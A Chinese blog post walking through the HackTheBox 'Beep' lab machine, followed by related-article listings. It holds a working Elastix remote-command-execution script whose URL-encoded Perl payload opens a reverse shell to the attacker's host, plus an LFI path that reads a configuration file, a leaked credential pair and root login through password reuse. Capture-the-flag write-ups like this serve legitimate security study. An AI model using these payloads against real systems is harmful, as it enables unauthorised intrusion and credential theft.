HackTheBox::Beep

最新推荐文章于 2024-08-16 18:41:12 发布
最新推荐文章于 2024-08-16 18:41:12 发布
阅读量286 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127243731
版权

0x00 信息收集

sudo nmap -Pn -sV -sS -T 4 10.10.10.7 //sS,SYN扫描,这是一个基本的扫描方式,它被称为半开放扫描,因为这种技术使得Nmap不需要通过完整的握手,就能获得远程主机的信息,但是需要root权限

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/https?
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

首先查看80端口,发现使用了elastix

同时10000端口同样开启了http服务

爆破路径,未发现可利用的地方。
10000端口的exp都需要利用用户名和密码,并且在多次尝试后IP被blocked,所以突破点集中在elastix.

0x01 漏洞利用

在exploidb中发现elastix有一个远程命令执行漏洞。
https://www.exploit-db.com/exploits/18650
但是该脚本执行出现问题,据报错信息,与SSL有关,继续查找相关信息。
程序中需要使用SIP(是一个应用层的信令控制协议。用于创建、修改和释放一个或多个参与者的会话),此处利用Kali的svwar定位SIP。

svwar -m INVITE -e100-300 10.10.10.7

调整Kali中有关TLS的设定

vim /etc/ssl/openssl.cnf
#将
[system_default_sect]
MinProtocol = TLSv1.2
CipherString = DEFAULT@SECLEVEL=2
#修改为
[system_default_sect]
MinProtocol = None
CipherString = DEFAULT

修改EXP的代码如下
import urllib
import ssl
rhost="10.10.10.7"
lhost="10.10.14.5"
lport=4444
extension="233"
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url, context=ctx)

执行脚本即可得到一个低权限的shell

0x02 权限提升

利用exploit-db中提到的利用nmap提权,成功获取root权限。

0x03 其他思路

通过exploit-db的搜索,会发现elaxtix还有一个LFI的漏洞,同样可以利用该漏洞。

https://10.10.10.7//vtigercrm/graph.php?current_language=…/…/…/…/…/…/…/…//etc/amportal.conf&module=Accounts&action

通过被包含的文件可以得到elastix账号和密码:admin/jEhdIekWmdjE 利用账号密码,可以成功登录到后台。

利用大部分人密码设置雷同的心理,尝试利用ssh登录。

ssh -l root 10.10.10.7

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HackTheBox-多种姿势渗透beep靶机
weixin_43111940的博客
04-19 343
端口信息 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open s
实战HackTheBox里面的Beep
知柯信安
01-11 1594
与之前一样,第一步是运行Nmap扫描以识别正在运行的信息。 # Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7 Nmap scan report for 10.10.10.7 Host is up (0.033s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 22/t
hackthebox-beep(考点:elastix)
冬萍子癸水
04-10 391
nmap 很多端口,看到ssh想到登录。再看看80 打开是elastix 网上搜搜相关漏洞 https://www.exploit-db.com/exploits/37637 主要就是这个,以后看到elastix先来一发这俩。 https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc...
Hack the box靶机 beep
菜浪马废的博客
05-19 175
看看有没有漏洞可用 查看网页源代码 会让信息更立正 用得到的信息直连ssh可以获得root
Hack The Box】linux练习-- beep
人间体佐菲的博客
11-09 353
Hack The Box】linux练习-- beep
BEEP:BEEP-开源蜜蜂监控-AppAPIsensor数据
04-09
BEEP-开源蜜蜂监视(v2.2.1) BEEP是蜜蜂监控(Laravel PHP)框架API +一个(Angular JS)应用程序和一个(Influx)时间序列传感器数据数据库的组合。 创建成本有效的测量硬件也有第一步。 它的关键功能是将用户...
SuperNova_example_beep:超级新人
04-04
标题中的"SuperNova_example_beep:超级新人"很可能是指一个基于SuperNova框架开发的示例项目,其中"beep"可能是项目的一个代号或者特色功能。这个项目可能旨在帮助新手快速理解和入门SuperNova框架,因此被称为"超级...
beep-beep-beep-beep-beep:好好玩!
05-22
:headphone: :headphone: :headphone: :headphone: :headphone: :headphone: :headphone: :headphone: :headphone:用法作为CLI $ npm i beep-beep-beep-beep-beep -g$ beep-beep-beep-beep-beep作为一个模块 var ...
beep:ash使用beep播放各种音乐的bash脚本的集合♫
05-23
ash使用beep播放各种音乐的bash脚本的集合♫ 需要任何公关 UTF-8 仅一个哔声命令(如果可能):容易杀死 5个空格缩进: beep大小+空格 -n上的新行和选项空间对齐:可读差异 打Kong卡样式(线宽80个字符) 如何发出...
MessengerBot:Beep Boop,我是机器人
02-09
MessengerBot 一个用于过滤Facebook Messenger中内容的简单机器人主文件是index.js 客户端在Facebook中为机器人定义对象客户端消息定义了从Facebook收到的对象消息仍然有很多错误和许多待办事项
0x11-HackTheBox-Beep
0pr
05-26 374
目录 历史命令 目标 能学到什么? 什么是 Elastix? 什么是 FreePBX? Elastix FreePBX 远程代码执行漏洞 Nmap Rpcclient Smbclient Enum4linux Nmap Read More Ldapsearch Sambe on 139,445 Rpc DNS on 53 Kerberos on 88 Evil-winrm Foothold Privilege Escalation Manual Enumeration PowerView.p
Linux/Beep
ve9etable的博客
08-07 925
HTB Beep[Hack The Box HTB靶场]writeup系列5
重新启程
02-04 3510
本题是retire机器的第五台了 目录 0x00 靶场信息 0x01 信息搜集 0x02 业务探测 80端口主页:elastix freepbx 80端口mail业务:roundcube webmail 10000端口:webmin 0x03 漏洞分析 elastix roundcube webmin 0x03 web攻击 roundcube webmin elas...
【HTB系列】Beep
Ms08067安全实验室
12-08 982
这次挑战的是 HTB 的第5台靶机:Beep,评分很高,难度中等靶机描述Beep 运行了大量的服务,这对正确发掘入口点有一定的挑战,由于存在大量的攻击向量,或许会让你不知所措,幸运地是,...
讯时网站管理系统通杀0DAY漏洞
OOM
08-21 5761
在谷歌搜索 inurl: admin/admin_news_pl_view.asp    打开搜索到的网址或者输入 inurl:news_more.asp?lm2=   然后修改成 admin/admin_news_pl_view.asp?id=1 或者 admin/admin_news_pl_view.asp?id=2 或者 admin/admin_news_pl_view.asp?id=
Elastix配准工具使用入门
热门推荐
风言风语
03-21 1万+
Elastix是一个基于ITK开发的处理医学图像配准问题的工具。本文简单的介绍了Elastix的相关信息和使用方式,希望能对他人有所帮助。
如何检验linux 、elastix服务器是否遭受过攻击
Commander_Officer的专栏
03-20 884
1:检测是否有人暴力ssh破解   用这个命令,查看一下secure文件   more /var/log/secure |grep "Refused user" 我查看的结果如下 bangian vsftpd:pam_listfile (vsftpd:auth):Refused user shutdown for serevice vsftpd
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 282
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
C#调用Win32 API:Beep函数示例
在上面的示例中,`Main` 方法创建了一个 `Random` 对象,用于生成随机频率和持续时间,然后调用 `Beep()` 生成一系列随机音调。 调用 Win32 API 可能会涉及到安全问题,因为 `DllImport` 允许调用任意 DLL 中的函数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值